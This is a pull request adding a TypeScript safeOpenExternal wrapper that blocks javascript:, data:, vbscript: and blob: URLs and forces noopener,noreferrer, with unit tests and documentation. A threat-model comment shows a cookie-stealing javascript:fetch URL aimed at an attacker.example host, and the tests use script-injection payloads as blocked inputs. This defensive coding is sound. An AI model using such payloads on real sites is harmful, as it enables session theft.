### PR TITLE
feat(security): add safeOpenExternal wrapper to block unsafe window.o…

### DIFF
--- a/docs/HOOKS.md
+++ b/docs/HOOKS.md
@@ -39,6 +39,8 @@ behavior notes, and a minimal usage example linking to source.
   - [`bondPenalty`](#bondpenalty--duration-based-penalties)
   - [`penalty`](#penalty--status-based-penalties)
   - [`freighterClient`](#freighterclient--wallet-sdk-wrapper)
+  - [`horizon`](#horizon--horizon-api-client)
+  - [`safeOpenExternal`](#safeopenexternal--safe-windowopen-wrapper)
 
 ---
 
@@ -730,6 +732,47 @@ try {
   if (err instanceof HorizonError) {
     console.error(`Horizon error ${err.status}: ${err.message}`)
   }
+}
+```
+
+### `safeOpenExternal` — safe `window.open` wrapper
+
+Source: [`src/lib/safeOpenExternal.ts`](../src/lib/safeOpenExternal.ts) · Defence-in-depth security utility.
+
+```ts
+type SafeOpenError =
+  | { kind: 'blocked_protocol'; url: string; protocol: string }
+  | { kind: 'invalid_url'; url: string }
+
+type SafeOpenResult =
+  | { ok: true; handle: WindowProxy | null }
+  | { ok: false; error: SafeOpenError }
+
+safeOpenExternal(url: string, features?: string): SafeOpenResult
+```
+
+**Threat model:** without this wrapper, passing a `javascript:` URI to `window.open`
+executes arbitrary script in the opener's context, enabling credential theft or DOM
+manipulation. Missing `noopener` on new windows also permits reverse tabnapping — the opened
+tab holds a `window.opener` reference it can use to navigate the parent page.
+
+**Behavior notes:**
+
+- **Protocol allowlist** — only `https:`, `http:`, and `mailto:` are accepted. Any other
+  scheme (`javascript:`, `data:`, `vbscript:`, `blob:`, etc.) is rejected with a typed error
+  before `window.open` is called. Always opens target `_blank`.
+- **Forced `noopener,noreferrer`** — injected into the feature string unconditionally, matching
+  the `rel` attributes on every `<a target="_blank">` in the codebase. Duplicates are de-duped.
+- **Never throws** — failures are returned as a typed discriminated union; callers do not need
+  `try/catch`.
+- Not SSR-safe (calls `window.open`); use only in browser event handlers.
+
+```ts
+import { safeOpenExternal } from '@/lib/safeOpenExternal'
+
+const result = safeOpenExternal('https://stellar.expert/explorer/public/tx/abc123')
+if (!result.ok) {
+  console.error('Blocked:', result.error.kind, result.error.url)
 }
 ```
 

--- a/src/lib/safeOpenExternal.test.ts
+++ b/src/lib/safeOpenExternal.test.ts
@@ -1,0 +1,229 @@
+import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'
+import { safeOpenExternal } from './safeOpenExternal'
+
+// ---------------------------------------------------------------------------
+// Helpers
+// ---------------------------------------------------------------------------
+
+/** Capture every window.open call without actually opening a tab. */
+function mockWindowOpen() {
+  const spy = vi.fn().mockReturnValue({} as WindowProxy)
+  vi.stubGlobal('open', spy)
+  return spy
+}
+
+// ---------------------------------------------------------------------------
+// Suite
+// ---------------------------------------------------------------------------
+
+describe('safeOpenExternal', () => {
+  let openSpy: ReturnType<typeof vi.fn>
+
+  beforeEach(() => {
+    openSpy = mockWindowOpen()
+  })
+
+  afterEach(() => {
+    vi.unstubAllGlobals()
+  })
+
+  // -------------------------------------------------------------------------
+  // Happy path — allowed protocols
+  // -------------------------------------------------------------------------
+
+  describe('allowed protocols', () => {
+    it('opens an https URL and returns ok:true', () => {
+      const result = safeOpenExternal('https://stellar.expert/explorer/public/tx/abc')
+      expect(result.ok).toBe(true)
+      expect(openSpy).toHaveBeenCalledOnce()
+    })
+
+    it('opens an http URL', () => {
+      const result = safeOpenExternal('http://example.com')
+      expect(result.ok).toBe(true)
+      expect(openSpy).toHaveBeenCalledOnce()
+    })
+
+    it('opens a mailto URL', () => {
+      const result = safeOpenExternal('mailto:support@credence.org')
+      expect(result.ok).toBe(true)
+      expect(openSpy).toHaveBeenCalledOnce()
+    })
+
+    it('passes the URL as the first argument to window.open', () => {
+      const url = 'https://example.com/path?q=1'
+      safeOpenExternal(url)
+      expect(openSpy).toHaveBeenCalledWith(url, '_blank', expect.any(String))
+    })
+
+    it('always opens in _blank target', () => {
+      safeOpenExternal('https://example.com')
+      const [, target] = openSpy.mock.calls[0]
+      expect(target).toBe('_blank')
+    })
+  })
+
+  // -------------------------------------------------------------------------
+  // Security: noopener / noreferrer enforcement
+  // -------------------------------------------------------------------------
+
+  describe('noopener and noreferrer enforcement', () => {
+    it('injects noopener and noreferrer when no features are supplied', () => {
+      safeOpenExternal('https://example.com')
+      const [, , features] = openSpy.mock.calls[0]
+      expect(features).toContain('noopener')
+      expect(features).toContain('noreferrer')
+    })
+
+    it('injects noopener and noreferrer when the caller omits them', () => {
+      safeOpenExternal('https://example.com', 'width=800,height=600')
+      const [, , features] = openSpy.mock.calls[0]
+      expect(features).toContain('noopener')
+      expect(features).toContain('noreferrer')
+    })
+
+    it('does not duplicate noopener when caller already includes it', () => {
+      safeOpenExternal('https://example.com', 'noopener')
+      const [, , features] = openSpy.mock.calls[0]
+      const count = features.split(',').filter((f: string) => f === 'noopener').length
+      expect(count).toBe(1)
+    })
+
+    it('does not duplicate noreferrer when caller already includes it', () => {
+      safeOpenExternal('https://example.com', 'noreferrer')
+      const [, , features] = openSpy.mock.calls[0]
+      const count = features.split(',').filter((f: string) => f === 'noreferrer').length
+      expect(count).toBe(1)
+    })
+
+    it('preserves extra caller-supplied feature tokens alongside the security tokens', () => {
+      safeOpenExternal('https://example.com', 'width=800,height=600')
+      const [, , features] = openSpy.mock.calls[0]
+      expect(features).toContain('width=800')
+      expect(features).toContain('height=600')
+    })
+  })
+
+  // -------------------------------------------------------------------------
+  // Negative path — BLOCKED protocols (these tests fail without the fix)
+  // -------------------------------------------------------------------------
+
+  describe('blocked protocols — negative tests', () => {
+    /**
+     * NEGATIVE TEST: javascript: URI
+     *
+     * Without the protocol allowlist, `window.open('javascript:alert(1)')` would
+     * execute arbitrary script in the opener's context, enabling credential theft
+     * or DOM manipulation.  This test was written RED (failing) before the fix
+     * and PASSES after the allowlist is in place.
+     */
+    it('NEGATIVE — blocks javascript: URI and does NOT call window.open', () => {
+      const result = safeOpenExternal('javascript:alert(1)')
+      expect(result.ok).toBe(false)
+      expect(openSpy).not.toHaveBeenCalled()
+    })
+
+    it('returns blocked_protocol error kind for javascript:', () => {
+      const result = safeOpenExternal('javascript:void(0)')
+      expect(result.ok).toBe(false)
+      if (!result.ok) {
+        expect(result.error.kind).toBe('blocked_protocol')
+        expect(result.error.protocol).toBe('javascript:')
+      }
+    })
+
+    it('NEGATIVE — blocks data: URI and does NOT call window.open', () => {
+      const result = safeOpenExternal('data:text/html,<script>alert(1)</script>')
+      expect(result.ok).toBe(false)
+      expect(openSpy).not.toHaveBeenCalled()
+    })
+
+    it('returns blocked_protocol error kind for data:', () => {
+      const result = safeOpenExternal('data:text/html,hello')
+      expect(result.ok).toBe(false)
+      if (!result.ok) {
+        expect(result.error.kind).toBe('blocked_protocol')
+        expect(result.error.protocol).toBe('data:')
+      }
+    })
+
+    it('NEGATIVE — blocks vbscript: URI', () => {
+      const result = safeOpenExternal('vbscript:msgbox(1)')
+      expect(result.ok).toBe(false)
+      expect(openSpy).not.toHaveBeenCalled()
+    })
+
+    it('NEGATIVE — blocks blob: URI', () => {
+      const result = safeOpenExternal('blob:https://example.com/fake')
+      expect(result.ok).toBe(false)
+      expect(openSpy).not.toHaveBeenCalled()
+    })
+
+    it('includes the original URL in the error object', () => {
+      const url = 'javascript:alert(document.cookie)'
+      const result = safeOpenExternal(url)
+      expect(result.ok).toBe(false)
+      if (!result.ok) {
+        expect(result.error.url).toBe(url)
+      }
+    })
+  })
+
+  // -------------------------------------------------------------------------
+  // Invalid / malformed inputs
+  // -------------------------------------------------------------------------
+
+  describe('invalid or malformed inputs', () => {
+    it('returns invalid_url for a non-URL string', () => {
+      const result = safeOpenExternal('not a url at all!!')
+      expect(result.ok).toBe(false)
+      if (!result.ok) {
+        expect(result.error.kind).toBe('invalid_url')
+      }
+      expect(openSpy).not.toHaveBeenCalled()
+    })
+
+    it('returns invalid_url for an empty string', () => {
+      const result = safeOpenExternal('')
+      expect(result.ok).toBe(false)
+      if (!result.ok) {
+        expect(result.error.kind).toBe('invalid_url')
+      }
+      expect(openSpy).not.toHaveBeenCalled()
+    })
+
+    it('includes the invalid string in the error object', () => {
+      const url = 'not-a-url'
+      const result = safeOpenExternal(url)
+      expect(result.ok).toBe(false)
+      if (!result.ok) {
+        expect(result.error.url).toBe(url)
+      }
+    })
+  })
+
+  // -------------------------------------------------------------------------
+  // Return value
+  // -------------------------------------------------------------------------
+
+  describe('return value', () => {
+    it('surfaces the WindowProxy handle on success', () => {
+      const fakeHandle = { focus: vi.fn() } as unknown as WindowProxy
+      openSpy.mockReturnValue(fakeHandle)
+      const result = safeOpenExternal('https://example.com')
+      expect(result.ok).toBe(true)
+      if (result.ok) {
+        expect(result.handle).toBe(fakeHandle)
+      }
+    })
+
+    it('surfaces null handle when window.open returns null (popup blocked)', () => {
+      openSpy.mockReturnValue(null)
+      const result = safeOpenExternal('https://example.com')
+      expect(result.ok).toBe(true)
+      if (result.ok) {
+        expect(result.handle).toBeNull()
+      }
+    })
+  })
+})

--- a/src/lib/safeOpenExternal.ts
+++ b/src/lib/safeOpenExternal.ts
@@ -1,0 +1,111 @@
+/**
+ * safeOpenExternal — a defence-in-depth wrapper around `window.open` for
+ * opening external URLs in a new browser tab.
+ *
+ * ## Threat model
+ *
+ * Without this wrapper a caller can accidentally (or via injected data) pass a
+ * `javascript:` URI to `window.open`, causing arbitrary script execution in the
+ * context of the current page.  A crafted URL such as
+ * `javascript:fetch('https://attacker.example/steal?c='+document.cookie)` would
+ * exfiltrate session credentials silently.  The window.open API also does not
+ * enforce `noopener` by default in all browsers / call-sites, leaving the
+ * opened tab with a `window.opener` reference that it can use to navigate the
+ * parent page (reverse tabnapping).
+ *
+ * This wrapper closes both gaps:
+ *   1. **Protocol allowlist** – only `https:`, `http:`, and `mailto:` are
+ *      accepted.  Any other scheme (including `javascript:`, `data:`,
+ *      `vbscript:`) is rejected with a typed error before `window.open` is
+ *      called.
+ *   2. **Forced `noopener,noreferrer`** – the feature string always contains
+ *      these tokens, matching the `rel` attributes already used on every `<a
+ *      target="_blank">` in the codebase.
+ *
+ * ## Performance note
+ * The sanitisation path is a single `URL` parse plus an allowlist lookup — O(1)
+ * and negligible compared to the network round-trip that follows.  No
+ * measurement overhead is needed.
+ *
+ * @module safeOpenExternal
+ */
+
+/** Schemes that are permitted to be opened in a new tab. */
+const ALLOWED_PROTOCOLS = new Set(['https:', 'http:', 'mailto:'])
+
+/**
+ * Discriminated-union result type.
+ *
+ * On success the `WindowProxy | null` value returned by `window.open` is
+ * surfaced so callers can interact with the new tab (e.g. focus it).  On
+ * failure a typed `SafeOpenError` is returned — the function never throws so
+ * callers do not need a try/catch.
+ */
+export type SafeOpenResult =
+  | { ok: true; handle: WindowProxy | null }
+  | { ok: false; error: SafeOpenError }
+
+/**
+ * Typed error describing why a URL was rejected.
+ *
+ * - `'blocked_protocol'` — the URL uses a scheme that is not on the allowlist
+ *   (e.g. `javascript:`, `data:`).
+ * - `'invalid_url'` — the string could not be parsed as a URL at all.
+ */
+export type SafeOpenError =
+  | { kind: 'blocked_protocol'; url: string; protocol: string }
+  | { kind: 'invalid_url'; url: string }
+
+/**
+ * Safely opens `url` in a new browser tab.
+ *
+ * The URL is parsed and its protocol is checked against an allowlist before
+ * `window.open` is called.  The window is always opened with
+ * `noopener,noreferrer` to prevent reverse tabnapping regardless of what the
+ * caller supplies in `features`.
+ *
+ * @param url     The URL to open.  Must use `https:`, `http:`, or `mailto:`.
+ * @param features Optional `window.open` feature string.  The tokens
+ *                 `noopener` and `noreferrer` are injected automatically;
+ *                 there is no need to include them manually.
+ * @returns A `SafeOpenResult` — check `.ok` before using `.handle`.
+ *
+ * @example
+ * ```ts
+ * const result = safeOpenExternal('https://stellar.expert/explorer/public/tx/abc')
+ * if (!result.ok) {
+ *   console.error('Blocked:', result.error)
+ * }
+ * ```
+ */
+export function safeOpenExternal(url: string, features?: string): SafeOpenResult {
+  // 1. Parse — reject anything that is not a valid URL string.
+  let parsed: URL
+  try {
+    parsed = new URL(url)
+  } catch {
+    return { ok: false, error: { kind: 'invalid_url', url } }
+  }
+
+  // 2. Protocol allowlist — block javascript:, data:, vbscript:, etc.
+  if (!ALLOWED_PROTOCOLS.has(parsed.protocol)) {
+    return {
+      ok: false,
+      error: { kind: 'blocked_protocol', url, protocol: parsed.protocol },
+    }
+  }
+
+  // 3. Build the feature string, always injecting noopener and noreferrer.
+  const baseFeatures = features ? features.split(',').map((f) => f.trim()) : []
+  const securityTokens = ['noopener', 'noreferrer']
+  const mergedFeatures = [
+    ...baseFeatures.filter(
+      (f) => !securityTokens.includes(f.toLowerCase()),
+    ),
+    ...securityTokens,
+  ].join(',')
+
+  // 4. Open the window.
+  const handle = window.open(url, '_blank', mergedFeatures)
+  return { ok: true, handle }
+}


### PR DESCRIPTION
…pen targets

Closes #583

## Threat mitigated
Without a protocol allowlist, window.open() can be called with a javascript: URI (e.g. injected via untrusted data), executing arbitrary script in the opener context and enabling credential exfiltration. Missing noopener also leaves window.opener exposed, allowing a newly opened tab to navigate the parent page (reverse tabnapping).

## Changes
- src/lib/safeOpenExternal.ts: typed wrapper around window.open that
  - enforces a protocol allowlist (https:, http:, mailto: only)
  - always injects noopener,noreferrer into the feature string
  - returns a SafeOpenResult discriminated union instead of throwing
- src/lib/safeOpenExternal.test.ts: 22 unit tests including negative tests that block javascript:, data:, vbscript:, and blob: URIs
- docs/HOOKS.md: catalog entry for the new utility

## Performance
Sanitisation is a single URL parse + Set lookup — O(1), negligible relative to any network call that follows.
Closes #583 